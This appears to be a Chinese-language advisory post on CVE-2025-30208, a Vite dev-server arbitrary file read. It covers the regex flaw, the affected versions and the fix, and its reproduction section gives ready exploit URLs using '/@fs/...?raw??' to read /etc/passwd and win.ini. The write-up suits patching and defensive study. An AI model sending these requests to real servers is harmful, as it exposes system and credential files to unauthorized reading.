CVE-2025-30208任意文件读取漏洞

090716zzj

​ CVE-2025-30208是Vite开发服务器中存在的一个高危逻辑漏洞，允许攻击者通过构造特殊的URL绕过文件访问限制，读取服务器上的任意文件（如配置文件、密钥、数据库凭据等）。该漏洞的利用条件需满足两点：开发服务器通过--host或server.host配置暴露至网络（非默认配置），且使用受影响版本的Vite由于Vite广泛应用于Vue、React等主流前端框架，潜在影响范围涉及数十万级资产。
​技术原理
漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数（如?raw??或?import&raw??）时，Vite对URL尾部分隔符（如?和&）的正则匹配不严格，导致安全检查被绕过。例如，攻击者可构造类似/@fs/etc/passwd?raw??的请求，利用@fs机制（本用于访问项目允许列表内的文件）读取系统敏感文件官方修复方案通过正则表达式/[?&]+$/移除URL末尾的冗余分隔符，从而阻断绕过路径。
影响范围
• Vite 4.5.9及更早版本
• 5.0.0 ≤ Vite ≤ 5.4.14
• 6.0.0 ≤ Vite ≤ 6.0.11
• 6.1.0 ≤ Vite ≤ 6.1.1
• 6.2.0 ≤ Vite ≤ 6.2.2
漏洞复现
在受影响版本的Vite开发服务器构造请求访问敏感文件
#示例:http://目标ip:端口/@fs/路径?raw??
# linux示例
http://目标IP:端口/@fs/etc/passwd?raw??
# windows示例
http://目标IP:端口/@fs/c://windows/win.ini?import&raw??
原文章:【CVE-2025-30208】Vite开发服务器任意文件读取漏洞 - 极核GetShell
​